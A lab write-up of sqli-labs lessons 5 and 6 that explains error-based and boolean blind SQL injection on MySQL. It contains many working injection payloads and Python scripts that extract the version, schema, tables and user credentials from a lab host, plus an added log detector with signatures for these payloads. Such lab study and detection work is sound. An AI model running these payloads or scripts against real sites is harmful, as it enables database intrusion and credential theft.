Sqli-labs Review: Less05-06 Error-based Blind SQL Injection - GET

I worked through sqli-labs once before; this is a second pass to consolidate it, with all code typed out by hand to reinforce what I learned.


Error-based Blind SQL Injection

Functions Explained

  1. Functions used in blind injection

     rand()            produces a non-repeatable random sequence in the range 0~1; with an argument it becomes a fixed pseudo-random sequence
     rand(0), rand(1)  with an integer argument, rand uses it as the seed and generates a fixed pseudo-random sequence
     floor()           round down: floor(2.5) == 2
     count()           counts the number of tuples (rows)
     concat()          string concatenation
     extractvalue()    error output limited to 32 characters
     updatexml()       error output limited to 32 characters
    

    Less-5: brute-force injection with a script

    Less-6: error-based injection with floor(rand(x)*2)

Injection Methods

Less-6 (error-based blind SQL injection, double quotes) is used as the example below.

  1. Boolean-based blind injection, brute-forcing one character at a time

    1. left()
    2. ascii(), substr()
    3. regexp
    4. ord(), mid()

    ?id=1' and left((select version() limit 0,1),1)='s'#

  2. Error-based injection using the execution bug in floor(rand(x)*2)

    ?id=1" union select 1,count(*),concat((desired query),floor(rand(0)*2))a from information_schema.columns group by a#

    ?id=1" and (select 1 from(select count(*),concat((desired query),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  3. Error-based injection using extractvalue() (length limit of 32 characters; not available on MySQL 5.0, available on MySQL 5.6)

    ?id=1" and extractvalue(1,concat(0x7e,(desired query)))#

    ?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((desired query))x from information_schema.tables group by x)a))))#

    ?id=1" and extractvalue(1,concat(0x7e,(database())))#

    ?id=1" and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#

  4. Error-based injection using updatexml() (length limit of 32 characters)

    ?id=1" and updatexml(1,concat(0x7e,(desired query),0x7e),1)#

  5. Error-based injection using the duplication produced by name_const (older versions only: works on MySQL 5.0, not on MySQL 5.6)

    ?id=1" union select 1,2,3 from (select name_const((desired query),1),name_const((desired query),1))x #

    ?id=1" and exists(select * from (select * from(select name_const((desired query),0))a join(select name_const((desired query),0))b)c)#

  6. Error-based injection using an out-of-range double value

    ?id=1" union select (exp(~(select * from(select user())a))),2,3#

    Not tested successfully.

  7. Error-based injection using BIGINT overflow (these overflow errors are raised by MySQL 5.5.5 and above)

    SQL injection based on BIGINT overflow errors (https://www.cnblogs.com/lcamry/articles/5509112.html)

    Not tested successfully.

    ?id=1" union select (!(select * from (select user())x) - ~0),2,3#

    Templates:

    !(select*from(select user())x)-~0

    (select(!x-~0)from(select(select user())x)a)

    (select!x-~0.from(select(select user())x)a)

    select ~0+!(select*from(select user())x)

  8. A combined template:

    (select * from(select concat((desired query))x from information_schema.tables group by x)a)

    When a select * from ... query cannot be used, this universal template can stand in for the "(desired query)" placeholder in the payloads below

     ?id=1" and (select 1 from(select count(*),concat((desired query),floor(rand(0)*2))x from information_schema.tables group by x)a)#

     ?id=1" and extractvalue(1,concat(0x7e,(desired query)))#

     ?id=1" and updatexml(1,concat(0x7e,(desired query),0x7e),1)#

     ?id=1" and exists(select * from (select * from(select name_const((desired query),0))a join(select name_const((desired query),0))b)c)#

     ?id=1" union select 1,2,3 from (select name_const((desired query),1),name_const((desired query),1))x #

     ?id=1" union select (exp(~(select * from(select user())a))),2,3#

     and so on...
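
As an added example (not part of the original post), a small Python 3 detector for the payload families listed above, run over constructed access-log lines. The signatures, the log format and the sample lines are my own assumptions, not a production WAF ruleset.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload families listed above. They are matched against the
# decoded, lowercased query string with all whitespace removed, so URL encoding,
# case changes and spacing do not hide them. (Assumed patterns, not a WAF ruleset.)
ERROR_BASED = {
    "floor_rand_groupby": re.compile(r"floor\(rand\(\d*\)\*2\).*groupby"),
    "extractvalue": re.compile(r"extractvalue\("),
    "updatexml": re.compile(r"updatexml\("),
    "name_const": re.compile(r"name_const\("),
    "exp_overflow": re.compile(r"exp\(~"),
    "bigint_overflow": re.compile(r"!\(select.*\)-~0|~0\+!\("),
}
# Character-by-character boolean blind probes (left/mid/substr/ascii/ord/length).
BOOLEAN_BLIND = re.compile(r"(?:and|or)\(*(?:ascii|ord|mid|substr|left|length)\(")
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

def normalize(query):
    """Percent-decode twice (catches double encoding), lowercase, strip whitespace."""
    return re.sub(r"\s+", "", unquote_plus(unquote_plus(query)).lower())

def classify(url):
    """Return the set of injection families whose signature appears in the URL."""
    query = url.split("?", 1)[1] if "?" in url else ""
    q = normalize(query)
    hits = {name for name, rx in ERROR_BASED.items() if rx.search(q)}
    if BOOLEAN_BLIND.search(q):
        hits.add("boolean_blind")
    return hits

def scan_log(lines):
    """Return [(client_ip, sorted families)] for every log line carrying a signature."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        families = classify(m.group(2)) if m else set()
        if families:
            flagged.append((m.group(1), sorted(families)))
    return flagged

# Constructed sample access-log lines (not real traffic): one benign request and
# three probes built from the payload shapes shown on this page.
SAMPLE_LOG = [
    '10.10.10.5 - - [01/Mar/2019:10:00:01 +0800] "GET /sqli-labs/Less-6/?id=1 HTTP/1.1" 200 720',
    '10.10.10.5 - - [01/Mar/2019:10:00:02 +0800] "GET /sqli-labs/Less-5/?id=1%27and%20mid(version(),1,1)=%275%27--+ HTTP/1.1" 200 720',
    '10.10.10.9 - - [01/Mar/2019:10:00:03 +0800] "GET /sqli-labs/Less-6/?id=1%22%20and%20extractvalue(1,concat(0x7e,(database())))%23 HTTP/1.1" 200 640',
    '10.10.10.9 - - [01/Mar/2019:10:00:04 +0800] "GET /sqli-labs/Less-6/?id=1%22%20union%20select%201,count(*),concat(database(),floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a--+ HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for ip, families in scan_log(SAMPLE_LOG):
        print(ip, ",".join(families))
```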
    

Less-5: Error-based blind SQL injection, single quotes

  1. Testing

     ?id=1    normal
     ?id=1"   normal
     ?id=1'   error
     Boolean-based blind SQL injection is used below
    
  2. Guess the database version

     ?id=1'and left(version(),1)=4--+
     ?id=1'and left(version(),1)=5--+
     # result: 5.0.51a3ubuntu5
    

    Run the script

     # -*- coding: utf-8 -*-
     # filename: Less05-1 database_version.py

     import hackhttp

     def database_version(arg):
         # Boolean-based blind injection: test one character position at a time
         print "database_version start test..."
         payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
         version = ""
         for i in range(1, 20):
             for j in payloads:
                 hh = hackhttp.hackhttp()
                 msg = "1%27and%20mid(version(),{i},1)=%27{j}%27--+".format(i=i, j=j)
                 code, head, body, redirect_url, log = hh.http(arg + msg)
                 # "You are in" is only rendered when the injected condition is true
                 if 'You are in' in body:
                     version += j
                     print "第%s位是%s" % (i, j)
                     break
         print "数据库的版本为: {version}".format(version=version)

     if __name__ == '__main__':
         database_version('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  3. Guess the length of the database name

     ?id=1'and length(database())=7--+
     ?id=1'and length(database())=8--+
     # result: 8
    

    Run the script

     # -*- coding: utf-8 -*-
     # filename: Less05-2 database_length.py

     import hackhttp

     def database_length(arg):
         # try each candidate length until the true-condition page comes back
         print "database_length start test..."
         length = ""
         for j in range(1, 20):
             hh = hackhttp.hackhttp()
             msg = "1%27and%20length(database())={j}--+".format(j=j)
             code, head, body, redirect_url, log = hh.http(arg + msg)
             if 'You are in' in body:
                 length = j
                 break
         print "数据库的长度为: {length}".format(length=length)

     if __name__ == '__main__':
         database_length('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  4. Guess the database name

     ?id=1' and mid(database(),1,1)="a"--+
     ?id=1' and mid(database(),1,1)="b"--+
     # result: security
    

    Run the script

     # -*- coding: utf-8 -*-
     # filename: Less05-3 database_name.py

     import hackhttp

     def database_name(arg):
         # same loop as the version script, but against database()
         print "database_name start test..."
         payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
         name = ""
         for i in range(1, 20):
             for j in payloads:
                 hh = hackhttp.hackhttp()
                 msg = "1%27and%20mid(database(),{i},1)=%27{j}%27--+".format(i=i, j=j)
                 code, head, body, redirect_url, log = hh.http(arg + msg)
                 if 'You are in' in body:
                     name += j
                     print "第%s位是%s" % (i, j)
                     break
         # the original printed "数据库的版本为" here; this script recovers the name
         print "数据库名为: {name}".format(name=name)

     if __name__ == '__main__':
         database_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  5. Guess table names

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80--+

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1),1,1))=81--+

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=80--+

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=80--+

    Result: emails, users

    Run the script

     # -*- coding: utf-8 -*-
     # filename: Less05-4 table_name.py

     import hackhttp

     def table_name(arg):
         # k selects the table (limit k,1), i the character position, j the
         # candidate ASCII code; 0x7365637572697479 is 'security' in hex
         print "table_name start test..."
         table_name = ""
         for k in range(10):
             for i in range(1, 10):
                 for j in range(65, 122):
                     hh = hackhttp.hackhttp()
                     msg = "1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479%20limit%20{k},1),{i},1))={j}--+".format(k=k, i=i, j=j)
                     code, head, body, redirect_url, log = hh.http(arg + msg)
                     if 'You are in' in body:
                         table_name += chr(j)
                         print "第%s个表的第%s位的ASCII码值是%s" % (k+1, i, j)
                         break
             table_name += " "   # separate table names with a space
         print "security 数据库的表名为: {table_name}".format(table_name=table_name)

     if __name__ == '__main__':
         table_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  6. Guess column names

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^pass' limit 0,1)--+

    ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1))>65--+

    ?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1))>65--+

    Result: id username password

    Run the script

     # -*- coding: utf-8 -*-
     # filename: Less05-5 column_name.py

     import hackhttp

     def column_name(arg):
         # k selects the column (limit k,1), i the character position, j the
         # candidate ASCII code; 0x7573657273 is 'users' in hex
         print "column_name start test..."
         column_name = ""
         for k in range(10):
             for i in range(1, 15):
                 for j in range(65, 122):
                     hh = hackhttp.hackhttp()
                     msg = "1%27and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20{k},1),{i},1))={j}--+".format(k=k, i=i, j=j)
                     code, head, body, redirect_url, log = hh.http(arg + msg)
                     if 'You are in' in body:
                         column_name += chr(j)
                         print "第%s个列的第%s位的ASCII码值是%s" % (k+1, i, j)
                         break
             column_name += " "   # separate column names with a space
         print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name)

     if __name__ == '__main__':
         column_name('http://10.10.10.137/sqli-labs/Less-5/?id=')
    
  7. Guess the data

    ?id=1' and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id LIMIT 0,1),1,1))=68--+

    ?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68--+

    Run the script

     # -*- coding: utf-8 -*-
     # filename: Less05-5 data.py

     import hackhttp

     def data(arg):
         # k selects the row (limit k,1), i the character position, j the candidate
         # ASCII code; username and password are probed with separate requests
         print "data start test..."
         username = ""
         password = ""
         for k in range(14):
             for i in range(1, 15):
                 for j in range(48, 122):
                     hh = hackhttp.hackhttp()
                     username_msg = "1%27and%20ascii(substr((select%20username%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k, i=i, j=j)
                     password_msg = "1%27and%20ascii(substr((select%20password%20from%20security.users%20%20limit%20{k},1),{i},1))={j}--+".format(k=k, i=i, j=j)
                     # keep the two responses apart: the original overwrote body with the
                     # password response before the username response was ever checked
                     code, head, username_body, redirect_url, log = hh.http(arg + username_msg)
                     code, head, password_body, redirect_url, log = hh.http(arg + password_msg)
                     if 'You are in' in username_body:
                         username += chr(j)
                         print "username第%s个数据的第%s位的ASCII码值是%s" % (k+1, i, j)
                     if 'You are in' in password_body:
                         password += chr(j)
                         print "password第%s个数据的第%s位的ASCII码值是%s" % (k+1, i, j)
                     # no early break: the username and password characters at this
                     # position usually differ, so every candidate must be tried for both
             username += " "
             password += " "
         print "security 数据库的 user 表的username为: {username}".format(username=username)
         print "security 数据库的 user 表的password为: {password}".format(password=password)

     if __name__ == '__main__':
         data('http://10.10.10.137/sqli-labs/Less-5/?id=')
    

Less-6: Error-based blind SQL injection, double quotes

floor(rand(x)*2) - error-based blind SQL injection tutorial (full analysis of the principle) (https://blog.csdn.net/qq_35544379/article/details/77453019)

An expert's inference: for an integer x, if the sequence produced by floor(rand(x)*2) contains "0010" or "1101" before any "0011" or "1100" appears, then that floor(rand(x)*2) sequence can be used for error-based blind SQL injection.
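
As an added illustration (not from the original post or the linked tutorial), a Python model of the behaviour this rule summarises: a non-deterministic GROUP BY key is evaluated once to look the group up in the temporary table and again when a new group is inserted, so two consecutive values of the sequence are consumed and the inserted key can collide with one already stored. The bit sequence RAND0_LIKE is constructed here, not computed from MySQL's rand(0).

```python
def group_by_rand(bits, rows):
    """Simulate GROUP BY over `rows` source rows whose key is floor(rand(x)*2).

    `bits` is the 0/1 sequence that successive evaluations of the key yield.
    Modelled evaluation: the key is computed once to look the group up in the
    temporary table and, if the group is new, computed AGAIN for the insert.
    Returns ("ok", {key: count}) when grouping completes, or
    ("duplicate", key, row) when the insert hits a key that already exists,
    which is the "Duplicate entry" error the payloads above rely on.
    """
    seq = iter(bits)
    table = {}
    for row in range(1, rows + 1):
        key = next(seq)                  # first evaluation: lookup
        if key in table:
            table[key] += 1
            continue
        key = next(seq)                  # second evaluation: insert
        if key in table:                 # already present -> duplicate key
            return ("duplicate", key, row)
        table[key] = 1
    return ("ok", table)

def check_rule_patterns():
    """Run the four 4-bit patterns named in the rule above through the model."""
    return {p: group_by_rand(p, rows=2)[0] for p in ("0010", "1101", "0011", "1100")}

# Constructed sequence (not computed from MySQL) with the 0,1,1,0,1,1,... shape
# that the page relies on for rand(0).
RAND0_LIKE = "011011100111"

if __name__ == "__main__":
    print(group_by_rand(RAND0_LIKE, rows=2))   # two rows: no collision yet
    print(group_by_rand(RAND0_LIKE, rows=3))   # third row: duplicate key '1'
    print(check_rule_patterns())
```

With RAND0_LIKE the collision only appears from the third source row, which is why the payloads group over a table with many rows such as information_schema.tables.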

  1. Testing

     ?id=1    normal
     ?id=1'   normal
     ?id=1"   error


    Error-based blind SQL injection is used below

    Formula:

    ?id=1" union select 1,count(*),concat((desired query),floor(rand(0)*2))a from information_schema.columns group by a--+

    For example:

    ?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a--+

    ?id=1" union select 1,count(*),concat(@@version,floor(rand(0)*2))a from information_schema.tables group by a--+

    ?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a--+

    Sometimes a union query cannot be used; in that case use and instead

    ?id=1" and (select 1 from(select count(*),concat((desired query),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

  2. Guess the database

    ?id=1" and (select 1 from(select count(*),concat(table_schema,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    ?id=1" union select 1,count(*),concat(database(),floor(rand(0)*2))a from information_schema.tables group by a--+

  3. Count the tables

    ?id=1" and (select 1 from(select count(*),concat((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x20,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    ?id=1" union select 1,count(*),concat((select count(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x20,floor(rand(0)*2))a from information_schema.columns group by a--+

  4. Query table names

    ?id=1" and (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    ?id=1" union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+

  5. Count the columns

    ?id=1" and (select 1 from(select count(*),concat((select count(column_name) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    ?id=1" union select 1,count(*),concat((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+

  6. Column names

    ?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+

    ?id=1" union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a--+

  7. Query the data

    ?id=1" and (select 1 from(select count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    ?id=1" union select 1,count(*),concat((select concat(username,0x3a,0x20,password) from security.users limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a--+
